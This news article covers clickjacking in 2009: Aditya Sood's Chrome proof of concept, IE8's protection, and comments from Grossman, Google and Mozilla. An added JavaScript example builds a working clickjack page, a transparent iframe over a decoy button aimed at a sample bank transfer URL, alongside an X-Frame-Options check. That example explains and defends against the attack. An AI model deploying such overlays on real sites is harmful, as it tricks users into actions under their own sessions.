First Microsoft touts clickjacking protections in Internet Explorer 8, then a security researcher releases a proof of concept for a clickjacking attack targeting the Google Chrome Web browser. Clickjacking, some say, remains an issue that will require cooperation in the security community.
Clickjacking is not going away.
The same week Microsoft announced on Jan. 26 it had put protections
against clickjacking in Internet Explorer 8, security researcher Aditya Sood
posted on BugTraq on Jan. 29 a new
clickjacking advisory for
the Google Chrome browser, with a link to a proof of concept.
Officials at Google said they are aware of the issue, which affects Chrome
versions 1.0.154.43 and earlier. So far, Google says it has not seen any
attempts to exploit this vulnerability in the wild. Though the posted advisory
only mentions Google Chrome, there are reports that the same technique
works against Mozilla's Firefox 3.0.5 as well, though on Firefox it can
be mitigated by using the ClearClick anti-clickjacking feature contained in the
NoScript plug-in.
Internet Explorer 7 does not seem to be affected by Sood's method.
Still, clickjacking has affected all the major browsers. The technique was
publicized in 2008 by security researchers Jeremiah Grossman, CTO
of WhiteHat Security, and Robert Hansen. If done successfully,
clickjacking tricks users into clicking links or buttons on a page they cannot
see, and because the resulting request is sent by the user's own browser with the
user's own session, it effectively circumvents cross-site request forgery protections
that rely on the user knowingly confirming a transaction.
In Sood's
proof of concept,
users click on what appears to be a link to Yahoo.com, but
are actually directed to a site about cross-site scripting. Sood wrote:
A clickjacked page tricks a user into
performing undesired actions by clicking on a concealed link. On a clickjacked
page, the attackers show a set of dummy buttons, then load another page over it
in a transparent layer. The user thinks he is clicking the visible buttons,
while he/she is actually performing actions on the hidden page.
The hidden page may be an
authentic page, and therefore the attackers can trick users into performing
actions which the users never intended to do and there is no way of tracing
such actions later, as the user was genuinely authenticated on the other page.
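The layout Sood describes above, a visible decoy with the real page stacked over it in a transparent layer, is easy to reproduce, and the server-side opt-in that Internet Explorer 8 RC1 shipped against it is the X-Frame-Options response header (the article does not name the header; that is a fact added here). The following is an added example written for this page, not code from Sood's advisory or from any vendor quoted here. It builds the attacker-side overlay page as a static HTML string, then evaluates X-Frame-Options the way a browser that honours it would, and runs that check over a few constructed responses. All URLs, origins and header sets are made-up sample data.

```javascript
// Added example (not from the article). Run with Node.js; no browser needed,
// since it only generates and inspects markup and headers.

// Escape text for safe embedding in HTML attributes and element content.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Attacker's page: a visible decoy button, plus the target page loaded in an
// iframe that is fully transparent (opacity 0) and stacked above the decoy
// (higher z-index). `hotspot` is where the real button sits inside the framed
// target page; the frame is offset so that point lands exactly on the decoy,
// so the click the user aims at the decoy is delivered to the hidden page.
function buildClickjackPage(targetUrl, decoyLabel, hotspot) {
  const decoyX = 100, decoyY = 100;        // where the decoy is drawn
  const frameLeft = decoyX - hotspot.x;    // shift frame so hotspot overlaps decoy
  const frameTop = decoyY - hotspot.y;
  return [
    "<!DOCTYPE html><html><body>",
    `<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;z-index:1">` +
      `${escapeHtml(decoyLabel)}</button>`,
    `<iframe src="${escapeHtml(targetUrl)}" scrolling="no" frameborder="0" ` +
      `style="position:absolute;left:${frameLeft}px;top:${frameTop}px;` +
      `width:1000px;height:800px;opacity:0;z-index:2"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Site-side defence: decide whether a browser that honours X-Frame-Options
// would render `headers`' response inside a frame whose top-level document
// has origin `topOrigin`. `responseOrigin` is the framed page's own origin.
// IE8's implementation understood only DENY and SAMEORIGIN; a missing or
// unrecognised value leaves the page frameable, which is the Web's default.
function framingAllowed(headers, responseOrigin, topOrigin) {
  const name = Object.keys(headers).find(k => k.toLowerCase() === "x-frame-options");
  if (!name) return true;
  const value = String(headers[name]).trim().toUpperCase();
  if (value === "DENY") return false;
  if (value === "SAMEORIGIN") return responseOrigin === topOrigin;
  return true; // unrecognised value: treated as if the header were absent
}

// Quick audit a site owner or tester can run over captured responses:
// list the URLs an attacker page on `attackerOrigin` could still frame.
function auditFramingProtection(responses, attackerOrigin) {
  return responses
    .filter(r => framingAllowed(r.headers, new URL(r.url).origin, attackerOrigin))
    .map(r => r.url);
}

// Constructed sample responses (hypothetical hosts; not real captures).
const SAMPLE_RESPONSES = [
  { url: "https://bank.example/transfer",  headers: { "X-Frame-Options": "DENY" } },
  { url: "https://bank.example/help",      headers: { "x-frame-options": "sameorigin" } },
  { url: "https://shop.example/checkout",  headers: { "Content-Type": "text/html" } },
  { url: "https://shop.example/legacy",    headers: { "X-Frame-Options": "ALLOWALL" } },
];

const ATTACKER_ORIGIN = "https://attacker.example";

console.log(buildClickjackPage("https://bank.example/transfer?to=1&confirm=1",
                               "Click to claim your prize", { x: 300, y: 200 }));
console.log("frameable:", auditFramingProtection(SAMPLE_RESPONSES, ATTACKER_ORIGIN));
```

The audit only tells a site owner which pages are unprotected in browsers that honour the header; a browser that ignores it renders the frame regardless, which is why page-side frame-busting scripts remained in use alongside the header at the time.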
While Sood's post focused on Google Chrome, a Google spokesperson was quick
to point out that clickjacking is a larger issue that affects all Web browsers.
"The issue is tied to the way the Web and Web pages were designed to
work, and there is no simple fix for any particular browser," the
spokesperson said. "We are working with other stakeholders to come up with
a standardized long-term mitigation approach."
Although Microsoft put protection against clickjacking in the release candidate
for Internet Explorer 8, critics contend that Microsoft's IE 8 RC 1 clickjacking
solution is only a band-aid.
"While it's positive that Microsoft has chosen to do something to
safeguard against clickjacking, the new security feature offers very limited
protections," Grossman said. "Web site owners can do more to protect
their visitors, but unfortunately the average Web citizen still has no way to
defend themselves on their own. So most experts will agree the
anti-clickjacking feature will do little to stem the near-term risk."
Grossman suggested browser vendors consider bundling in the NoScript Firefox
plug-in by default.
"NoScript has powerful security features that can prevent clickjacking
as well as many other Web-based attacks, which also allows users to tune their
own level of desired security," he added. "For Internet Explorer,
Opera, Google Chrome, etc., they should embed similar features and
functionality in their products."
Johnathan Nightingale, a security researcher for Mozilla, said Mozilla's
efforts around preventing clickjacking have been more focused on comprehensive
solutions like its Content Security Policy proposal and implementing the Origin
header to thwart cross-site request forgery attacks.
"We've discussed these publicly with other
browser makers and the broader Web security community to ensure that we are
helping them prevent the attacks they're concerned about, and to benefit from
their experience," Nightingale said. "Changing the way we do security
on the Internet needs to be a group effort, and we'd welcome the participation
of the IE team in that work."